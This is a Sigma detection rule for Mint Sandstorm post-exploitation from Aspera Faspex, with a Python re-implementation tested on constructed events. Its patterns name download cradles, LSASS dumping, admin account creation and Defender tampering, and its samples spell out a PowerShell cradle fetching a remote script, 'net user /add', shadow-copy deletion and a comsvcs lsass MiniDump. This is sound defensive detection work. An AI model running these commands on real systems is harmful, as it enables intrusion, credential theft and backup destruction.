Mint Sandstorm - AsperaFaspex Suspicious Process Execution
Detects suspicious child processes of the Aspera Faspex Ruby interpreter (download cradles, encoded PowerShell, LSASS access, local account creation, Defender and LSA registry tampering, shadow-copy and backup-catalog deletion), as observed in Mint Sandstorm activity.
Sigma rule
title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution
id: 91048c0d-5b81-4b85-a099-c9ee4fb87979
status: test
description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
references:
    - https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
date: 2023-04-20
modified: 2023-04-25
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|contains|all:
            - 'aspera'
            - '\ruby'
    selection_special_child_powershell_img:
        Image|endswith:
            - '\powershell.exe'
            - '\powershell_ise.exe'
    selection_special_child_powershell_cli:
        - CommandLine|contains:
            - ' echo '
            - '-dumpmode'
            - '-ssh'
            - '.dmp'
            - 'add-MpPreference'
            - 'adscredentials'
            - 'bitsadmin'
            - 'certutil'
            - 'csvhost.exe'
            - 'DownloadFile'
            - 'DownloadString'
            - 'dsquery'
            - 'ekern.exe'
            - 'FromBase64String'
            - 'iex '
            - 'iex('
            - 'Invoke-Expression'
            - 'Invoke-WebRequest'
            - 'localgroup administrators'
            - 'net group'
            - 'net user'
            - 'o365accountconfiguration'
            - 'query session'
            - 'samaccountname='
            - 'set-MpPreference'
            - 'svhost.exe'
            - 'System.IO.Compression'
            - 'System.IO.MemoryStream'
            - 'usoprivate'
            - 'usoshared'
            - 'whoami'
        - CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}'
    selection_special_child_lsass_1:
        CommandLine|contains: 'lsass'
    selection_special_child_lsass_2:
        CommandLine|contains:
            - 'procdump'
            - 'tasklist'
            - 'findstr'
    selection_child_wget:
        Image|endswith: '\wget.exe'
        CommandLine|contains: 'http'
    selection_child_curl:
        Image|endswith: '\curl.exe'
        CommandLine|contains: 'http'
    selection_child_script:
        CommandLine|contains:
            - 'E:jscript'
            - 'e:vbscript'
    selection_child_localgroup:
        CommandLine|contains|all:
            - 'localgroup Administrators'
            - '/add'
    selection_child_net:
        CommandLine|contains: 'net' # Covers net1
        CommandLine|contains|all:
            - 'user'
            - '/add'
    selection_child_reg:
        - CommandLine|contains|all:
            - 'reg add'
            - 'DisableAntiSpyware'
            - '\Microsoft\Windows Defender'
        - CommandLine|contains|all:
            - 'reg add'
            - 'DisableRestrictedAdmin'
            - 'CurrentControlSet\Control\Lsa'
    selection_child_wmic_1:
        CommandLine|contains|all:
            - 'wmic'
            - 'process call create'
    selection_child_wmic_2:
        CommandLine|contains|all:
            - 'wmic'
            - 'delete'
            - 'shadowcopy'
    selection_child_vssadmin:
        CommandLine|contains|all:
            - 'vssadmin'
            - 'delete'
            - 'shadows'
    selection_child_wbadmin:
        CommandLine|contains|all:
            - 'wbadmin'
            - 'delete'
            - 'catalog'
    condition: selection_parent and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*)
falsepositives:
    - Unlikely
level: critical
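To see how the condition above actually combines its selections, here is a hand-written Python re-implementation of the rule's matching logic run over a handful of constructed process_creation events. This is an added example, not code from the Sigma project or the rule author, and it does not use pySigma or any backend: the three Sigma field names (ParentImage, Image, CommandLine) are the rule's own, the string lists and the regex are copied from the rule, and the sample events (paths, IP, base64 blob) are made up for illustration. It follows Sigma semantics for the modifiers: `contains` and `endswith` are case-insensitive, `re` is case-sensitive.

```python
import re

# Strings from selection_special_child_powershell_cli (first alternative), copied from the rule.
POWERSHELL_CLI_STRINGS = [
    " echo ", "-dumpmode", "-ssh", ".dmp", "add-MpPreference", "adscredentials",
    "bitsadmin", "certutil", "csvhost.exe", "DownloadFile", "DownloadString", "dsquery",
    "ekern.exe", "FromBase64String", "iex ", "iex(", "Invoke-Expression", "Invoke-WebRequest",
    "localgroup administrators", "net group", "net user", "o365accountconfiguration",
    "query session", "samaccountname=", "set-MpPreference", "svhost.exe",
    "System.IO.Compression", "System.IO.MemoryStream", "usoprivate", "usoshared", "whoami",
]
# Second alternative: the -EncodedCommand pattern. Sigma 're' is case-sensitive, so no re.I here.
ENCODED_CMD_RE = re.compile(r"[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}")


def contains(value, needles, require_all=False):
    """Sigma 'contains' / 'contains|all': case-insensitive substring test."""
    v = value.lower()
    hits = [n.lower() in v for n in needles]
    return all(hits) if require_all else any(hits)


def endswith(value, suffixes):
    """Sigma 'endswith': case-insensitive suffix test."""
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def evaluate(event):
    """Return the names of the rule branches the event satisfies ([] means no alert)."""
    parent, image, cli = (event.get(k, "") for k in ("ParentImage", "Image", "CommandLine"))
    # selection_parent gates every branch: the child must come from the Faspex Ruby interpreter.
    if not contains(parent, ["aspera", "\\ruby"], require_all=True):
        return []
    fired = []
    # all of selection_special_child_powershell_*: PowerShell image AND (string list OR encoded regex)
    ps_img = endswith(image, ["\\powershell.exe", "\\powershell_ise.exe"])
    ps_cli = contains(cli, POWERSHELL_CLI_STRINGS) or ENCODED_CMD_RE.search(cli) is not None
    if ps_img and ps_cli:
        fired.append("powershell")
    # all of selection_special_child_lsass_*: 'lsass' AND one of the three tool strings
    if contains(cli, ["lsass"]) and contains(cli, ["procdump", "tasklist", "findstr"]):
        fired.append("lsass")
    # 1 of selection_child_*: the glob is matched against the whole identifier, so the
    # selection_special_child_* selections are not part of this group.
    child_checks = {
        "wget": endswith(image, ["\\wget.exe"]) and contains(cli, ["http"]),
        "curl": endswith(image, ["\\curl.exe"]) and contains(cli, ["http"]),
        "script": contains(cli, ["E:jscript", "e:vbscript"]),
        "localgroup": contains(cli, ["localgroup Administrators", "/add"], require_all=True),
        "net": contains(cli, ["net"]) and contains(cli, ["user", "/add"], require_all=True),
        "reg": (contains(cli, ["reg add", "DisableAntiSpyware", "\\Microsoft\\Windows Defender"], require_all=True)
                or contains(cli, ["reg add", "DisableRestrictedAdmin", "CurrentControlSet\\Control\\Lsa"], require_all=True)),
        "wmic_1": contains(cli, ["wmic", "process call create"], require_all=True),
        "wmic_2": contains(cli, ["wmic", "delete", "shadowcopy"], require_all=True),
        "vssadmin": contains(cli, ["vssadmin", "delete", "shadows"], require_all=True),
        "wbadmin": contains(cli, ["wbadmin", "delete", "catalog"], require_all=True),
    }
    fired.extend(name for name, hit in child_checks.items() if hit)
    return fired


# Constructed sample events (not real telemetry). The Faspex install path is assumed.
FASPEX_RUBY = r"C:\Program Files\Aspera\Faspex\ruby\bin\ruby.exe"
SAMPLE_EVENTS = [
    {"label": "download cradle from Faspex", "ParentImage": FASPEX_RUBY,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"},
    {"label": "encoded command from Faspex", "ParentImage": FASPEX_RUBY,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"},
    {"label": "local account creation", "ParentImage": FASPEX_RUBY,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c net user svc_backup P@ssw0rd1 /add"},
    {"label": "lsass recon via tasklist", "ParentImage": FASPEX_RUBY,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c tasklist /fi "imagename eq lsass.exe"'},
    {"label": "shadow copy deletion", "ParentImage": FASPEX_RUBY,
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"label": "comsvcs MiniDump of lsass (gap)", "ParentImage": FASPEX_RUBY,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Temp\lsass.dmp full"},
    {"label": "benign Faspex worker", "ParentImage": FASPEX_RUBY,
     "Image": FASPEX_RUBY, "CommandLine": "ruby.exe script/delayed_job run"},
    {"label": "same cradle, non-Faspex parent", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"},
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(f"{e['label']:<36} -> {evaluate(e) or 'no match'}")
```

Two things the run makes visible that the YAML alone does not. First, `selection_parent` is a hard gate: the identical download cradle with a w3wp.exe parent never reaches any child branch, so this rule covers only post-exploitation through the Faspex Ruby process. Second, the LSASS branch is an AND of `lsass` with `procdump`, `tasklist` or `findstr`; a comsvcs.dll MiniDump of lsass launched from the same parent contains `lsass` and `.dmp` but is not a PowerShell image, so it falls through every branch. If that matters in your environment, pair this rule with a generic LSASS-dump rule rather than loosening the `all of` here.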